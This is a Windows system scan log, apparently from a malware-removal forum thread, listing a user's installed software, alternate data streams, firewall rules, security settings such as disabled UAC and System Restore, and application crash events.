Logitech SetPoint 6.32 (HKLM\...\SP6) (Version: 6.32.20 - Logitech)
Logitech Unifying Software 2.00 (HKLM\...\Logitech Unifying) (Version: 2.00.43 - Logitech)
Macromedia FreeHand MXa (HKLM-x32\...\{939740B5-0064-4779-854A-8C1086181C05}) (Version: 11.0.2 - Macromedia)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Menu Templates - Starter Kit (x32 Version: 9.0.4.0 - Nero AG) Hidden
Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50709.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version:  - )
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
MKVToolNix 9.2.0 (64bit) [20160504-01204] (HKLM-x32\...\MKVToolNix) (Version: 9.2.0 - Moritz Bunkus)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Templates - Starter Kit (x32 Version: 9.0.4.0 - Nero AG) Hidden
Mozilla Firefox 49.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 49.0.1 (x86 en-US)) (Version: 49.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 49.0.1.6109 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Network64 (Version: 130.0.374.000 - Hewlett-Packard) Hidden
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
ph (x32 Version: 1.0.0 - Your Company Name) Hidden
Pinball FX2 (HKLM\...\Steam App 226980) (Version:  - Zen Studios)
Plants vs. Zombies: Game of the Year (HKLM-x32\...\Steam App 3590) (Version:  - PopCap Games, Inc.)
PS_AIO_06_C309g-m_SW_Min (x32 Version: 130.0.396.000 - Hewlett-Packard) Hidden
PVSonyDll (Version: 1.00.0001 - NVIDIA Corporation) Hidden
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RAD Video Tools (HKLM-x32\...\RADVideo) (Version:  - )
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.92.115.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7443 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.00.12.0906 - REALTEK Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Remote Desktop Web Connection (HKLM-x32\...\TsActiveXClient) (Version:  - )
Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
SEGA Mega Drive & Genesis Classics (HKLM\...\Steam App 34270) (Version:  - Sega)
SolutionCenter (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Sound Forge Pro 10.0 (HKLM-x32\...\{3F9170C9-A7C2-408F-A4D8-EC77250040BF}) (Version: 10.0.368 - Sony)
SoundTrax (x32 Version: 4.0.18.0 - Nero AG) Hidden
Speccy (HKLM\...\Speccy) (Version: 1.11 - Piriform)
Splashtop Personal (HKLM-x32\...\{E7CF0F14-8C1D-41F3-85ED-579C108262C7}) (Version: 2.6.2.2 - Splashtop Inc.)
Splashtop Software Updater (HKLM-x32\...\Splashtop Software Updater) (Version: 1.5.6.15 - Splashtop Inc.)
Splashtop Streamer (HKLM-x32\...\{B7C5EA94-B96A-41F5-BE95-25D78B486678}) (Version: 2.6.5.2 - Splashtop Inc.)
Status (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Surgeon Simulator 2013 (HKLM-x32\...\Steam App 233720) (Version:  - Bossa Studios)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Tinker (x32 Version: 1.0.0001.131 - Microsoft Corporation) Hidden
Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version: 7.50 - C. Ghisler & Co.)
TrayApp (x32 Version: 130.0.376.000 - Hewlett-Packard) Hidden
Unity Web Player (HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\UnityWebPlayer) (Version: 4.5.4f2 - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Vanguard Princess (HKLM-x32\...\Steam App 262150) (Version:  - Tomoaki Sugeno)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
Winamp (HKLM-x32\...\Winamp) (Version: 5.572  - Nullsoft, Inc)
Winamp Detector Plug-in (HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
WinAVI Video Converter 9.0 (HKLM-x32\...\WinAVI Video Converter 9.09.0) (Version: 9.0 - WinAVI Video Converter 9.0)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Media Center Add-in for Flash (HKLM-x32\...\{E2D09AC2-4153-4817-AAEB-24F92A8BCE88}) (Version: 3.1.1.0 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
WinRAR archiver (HKLM\...\WinRAR archiver) (Version:  - )
Zen Bound® 2 (HKLM-x32\...\Steam App 61600) (Version:  - Secret Exit Ltd.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {62DBB2ED-53F7-4E86-A428-95BC28643547} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {8D465B44-5A73-4D53-8ED1-A5AB63B0D6F2} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {CBDDF58D-D4B7-49F1-95FC-8B25497AC7E2} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => C:\Program Files\Microsoft IntelliPoint\IPoint.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2009-10-16 11:50 - 2007-07-12 22:37 - 00085504 _____ () C:\Windows\System32\cpwmon64.dll
2016-09-01 18:12 - 2016-09-01 18:12 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-09-01 18:12 - 2016-09-01 18:12 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2009-10-15 19:01 - 2009-08-16 17:06 - 00166400 _____ () C:\Program Files\WinRAR\rarext.dll
2013-12-26 18:40 - 2009-02-27 17:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2016-09-01 18:13 - 2016-09-01 18:13 - 01041720 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2016-09-01 18:13 - 2016-09-01 18:13 - 00080184 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-05-30 13:11 - 2012-05-30 13:11 - 00176128 _____ () C:\Program Files (x86)\AIM\nssckbi.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Program Files\Common Files\Microsoft Shared:9JWpxEmW4v11qmJOqJ7pjYs [2200]
AlternateDataStreams: C:\ProgramData\Microsoft:cyqnzX4eKYNTzpFQUfDk [2544]
AlternateDataStreams: C:\ProgramData\Microsoft:okPhkWKR99NHqk9eugRi0qqcLPl [615]
AlternateDataStreams: C:\ProgramData\TEMP:33384BC0 [99]
AlternateDataStreams: C:\ProgramData\TEMP:3A6BC948 [115]
AlternateDataStreams: C:\ProgramData\TEMP:89C2A42C [116]
AlternateDataStreams: C:\ProgramData\TEMP:91486201 [185]
AlternateDataStreams: C:\ProgramData\TEMP:D2A5A561 [112]
AlternateDataStreams: C:\ProgramData\TEMP:DED17083 [250]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\remotepc => "(Default)"="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SplashtopRemoteService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Classes\exefile: "%1" %* <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)




==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2012-03-28 10:26 - 2016-10-16 17:31 - 00000261 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Kevin\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: Adobe Version Cue CS4 => 3
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: EPSON_EB_RPCV4_01 => 2
MSCONFIG\Services: EPSON_PM_RPCV4_01 => 2
MSCONFIG\Services: MSCSPTISRV => 3
MSCONFIG\Services: Nero BackItUp Scheduler 4.0 => 2
MSCONFIG\Services: PACSPTISVR => 3
MSCONFIG\Services: SPTISRV => 3
MSCONFIG\Services: Stereo Service => 2
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: GarminExpressTrayApp => "C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe"
MSCONFIG\startupreg: uTorrent => "C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{D72C2225-53D2-4132-8B62-6D47D74370B2}C:\program files (x86)\aim\aim.exe] => (Allow) C:\program files (x86)\aim\aim.exe
FirewallRules: [UDP Query User{4F2888B2-795C-43A2-9DE7-3D67C23E9EFD}C:\program files (x86)\aim\aim.exe] => (Allow) C:\program files (x86)\aim\aim.exe
FirewallRules: [{4AEFD5B7-6490-43B6-A9A3-8D434226D4C1}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
FirewallRules: [{31CEC40E-40A5-4384-A30E-D64A192315F8}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
FirewallRules: [{4A10FDEF-32EE-49BA-9079-60611F65FCA4}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
FirewallRules: [{DD66BCA3-D5EA-4019-A699-647CDBB35E4E}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
FirewallRules: [TCP Query User{5D882E10-30C6-4DCD-92DF-DED988BC4580}C:\program files (x86)\utorrent\utorrent.exe] => (Allow) C:\program files (x86)\utorrent\utorrent.exe
FirewallRules: [UDP Query User{3A1C4ED2-84AF-4DCE-A1CA-C95923C309A8}C:\program files (x86)\utorrent\utorrent.exe] => (Allow) C:\program files (x86)\utorrent\utorrent.exe
FirewallRules: [{2E782367-E17B-407D-A156-13750F7439C3}] => (Allow) C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{2E03B05A-5408-477A-A703-965AA4F38D25}] => (Allow) C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{828E6D48-4BF2-4AD2-81A9-2A1462B4E674}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{6F7B0A40-E20B-4B78-94FA-993027B60B4A}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{F657D074-33D8-4C55-944F-FFD1BDAA554D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Surgeon Simulator 2013\ss2013.exe
FirewallRules: [{89EFCCC9-BA0D-4714-9CD2-73D760666CBE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Surgeon Simulator 2013\ss2013.exe
FirewallRules: [{D9441015-6814-4FDC-82C5-05E4A8BDA33E}] => (Allow) C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{473B5F6C-8006-422B-9302-EBD49BEEE7F8}] => (Allow) C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{92BE4FFE-BD03-434A-B50B-BBC7A05AF9A6}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{BBE2A838-72DD-4384-A37F-A9E30A9CDE5F}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{EDC127AA-ACFE-4327-A7FB-0D5B26C9E705}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Zen Bound 2\ZenBound2.exe
FirewallRules: [{407E9A69-6A9D-4573-9D06-7701D04623EF}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Zen Bound 2\ZenBound2.exe
FirewallRules: [{81C652E8-93F8-4FF5-AFE7-816B706DF46E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Plants Vs Zombies\PlantsVsZombies.exe
FirewallRules: [{351ACEB7-3E70-457F-8B3A-B117D9773CF8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Plants Vs Zombies\PlantsVsZombies.exe
FirewallRules: [{2540ED78-3A39-463B-8CFD-96E82EAE2207}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Crazy Taxi\AppLauncher.exe
FirewallRules: [{D086F2AA-2D9F-40AA-B076-14243095359D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Crazy Taxi\AppLauncher.exe
FirewallRules: [{B76F0BEE-4A71-4EDA-AC6A-D0E48613429F}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{1A41D4FD-2C0A-4F89-A5F0-AA4072220F29}] => (Allow) LPort=2869
FirewallRules: [{11C64AB4-5865-4ADC-BA3B-25B773A59512}] => (Allow) LPort=1900
FirewallRules: [{E6A554D2-2B55-484B-B4FF-D78C819BAF8D}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{1185EED7-EB7E-4D9A-9006-3DB1A8F189AD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\vanguard-princess\vanpri.exe
FirewallRules: [{91CBB966-379A-4552-A10F-250BAEDC4597}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\vanguard-princess\vanpri.exe
FirewallRules: [{9E472EFA-71DA-4C1C-B092-3C2F4EFE9EBF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0414006B-564E-4090-9F33-E1B194A8AB1B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{18539329-1513-459B-B3AC-96015890535D}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{D868CC3B-43F9-453C-8FAA-9FC933E18A4A}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{9CF32D3C-B5C5-48E9-8C66-96A892AC7584}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D4CD6B89-B2A9-4061-AFF0-5E54D490FA1A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E2F64D7C-ABA8-4092-B61D-AE8CA23AC0FE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Pinball FX2\Pinball FX2.exe
FirewallRules: [{1C52BC0B-33F4-46D4-B687-8E4843E1919B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Pinball FX2\Pinball FX2.exe
FirewallRules: [{B0C34B83-6A58-445F-8E08-28836AAE7F5F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7B6912D4-1323-4A48-8B10-D6A3DAB365D8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{00584755-DC1B-4C14-91B9-965A2609796F}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{36053EB5-8C34-4C1A-9A98-9EFD493EE033}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{A770430F-CFCF-48DD-A7AF-EF983980494A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sega Classics\SEGAGameRoom.exe
FirewallRules: [{3463236B-F754-4051-A584-3546523C1C64}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sega Classics\SEGAGameRoom.exe
FirewallRules: [{80BF2E2B-86DE-4BAE-9526-1A1A6C6EFAC3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sega Classics\SEGAGenesisClassics.exe
FirewallRules: [{A8476046-D0F4-4931-8E3E-79223FDFDD98}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sega Classics\SEGAGenesisClassics.exe
FirewallRules: [{8F664E72-1E5A-43E1-905B-22BF6C8E184C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Castle of Illusion\COI.exe
FirewallRules: [{6C91283A-61AB-466C-9AA1-A8D4FABEBC1B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Castle of Illusion\COI.exe
FirewallRules: [{53B98CBD-2D6A-4BDB-83C6-6094927B5795}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{1A52D112-FE4B-42A0-B575-BC9DFB644FA2}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{3197322C-6630-42B1-9279-C7AB0A247498}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe
FirewallRules: [{1D97F4C4-D04D-4E24-A495-C39F5F510CB5}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeature.exe
FirewallRules: [{A8CB881E-56F2-478A-8526-F5649CB527CF}] => (Allow) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\DataProxy.exe

==================== Restore Points =========================

ATTENTION: System Restore is disabled

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (10/16/2016 05:50:05 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Faulting module name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Exception code: 0xc0000005
Fault offset: 0x00000000004d84f7
Faulting process id: 0x1128
Faulting application start time: 0x01d227f74136e66d
Faulting application path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Faulting module path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Report Id: 7f0efe6a-93ea-11e6-8875-60029255fa90

Error: (10/16/2016 05:50:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Faulting module name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Exception code: 0xc0000005
Fault offset: 0x00000000004d84f7
Faulting process id: 0x780
Faulting application start time: 0x01d227f73e8db574
Faulting application path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Faulting module path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Report Id: 7c67c948-93ea-11e6-8875-60029255fa90

Error: (10/16/2016 05:49:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Faulting module name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Exception code: 0xc0000005
Fault offset: 0x00000000004d84f7
Faulting process id: 0x600
Faulting application start time: 0x01d227f73a773381
Faulting application path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Faulting module path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Report Id: 78fd8f6b-93ea-11e6-8875-60029255fa90

Error: (10/16/2016 05:30:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Faulting module name: HandBrakeCLI.exe, version: 0.0.0.0, time stamp: 0x51a6417e
Exception code: 0xc0000005
Fault offset: 0x00000000004d84f7
Faulting process id: 0x54c
Faulting application start time: 0x01d227f48663c37c
Faulting application path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Faulting module path: C:\Program Files\Handbrake\HandBrakeCLI.exe
Report Id: c58d8dba-93e7-11e6-8875-60029255fa90

Error: (10/16/2016 05:04:31 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program wmplayer.exe version 12.0.7601.19148 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 13e8

Start Time: 01d227f0d9892e7d

Termination Time: 30

Application Path: C:\Program Files\Windows Media Player\wmplayer.exe

Report Id: 2087597f-93e4-11e6-8875-60029255fa90

Error: (10/16/2016 05:04:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program wmplayer.exe version 12.0.7601.19148 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1374

Start Time: 01d227f0cd111901

Termination Time: 30

Application Path: C:\Program Files\Windows Media Player\wmplayer.exe

Report Id: 146cdce6-93e4-11e6-8875-60029255fa90

Error: (10/14/2016 08:59:06 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HitmanPro_x64.exe, version: 3.7.14.280, time stamp: 0x57d93dfa
Faulting module name: HitmanPro_x64.exe, version: 3.7.14.280, time stamp: 0x57d93dfa
Exception code: 0xc0000005
Fault offset: 0x00000000002bef61
Faulting process id: 0x654
Faulting application start time: 0x01d2267f0da0a6ce
Faulting application path: G:\HitmanPro_x64.exe
Faulting module path: G:\HitmanPro_x64.exe
Report Id: 91e03e0e-9272-11e6-b528-c44060154998

Error: (10/14/2016 08:57:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HitmanPro_x64.exe, version: 3.7.14.280, time stamp: 0x57d93dfa
Faulting module name: HitmanPro_x64.exe, version: 3.7.14.280, time stamp: 0x57d93dfa
Exception code: 0xc0000005
Fault offset: 0x00000000002bef61
Faulting process id: 0x4d8
Faulting application start time: 0x01d2267ecd036c7e
Faulting application path: G:\HitmanPro_x64.exe
Faulting module path: G:\HitmanPro_x64.exe
Report Id: 5060e104-9272-11e6-b528-c44060154998

Error: (10/14/2016 08:04:59 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 512) (User: )
Description: The Cryptographic Services service failed to initialize the VSS backup "System Writer" object.

Details:
Could not query the status of the EventSystem service.

System Error:
A system shutdown is in progress.
.

Error: (10/14/2016 08:02:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CMD.EXE, version: 6.1.7601.17514, time stamp: 0x4ce78e2b
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
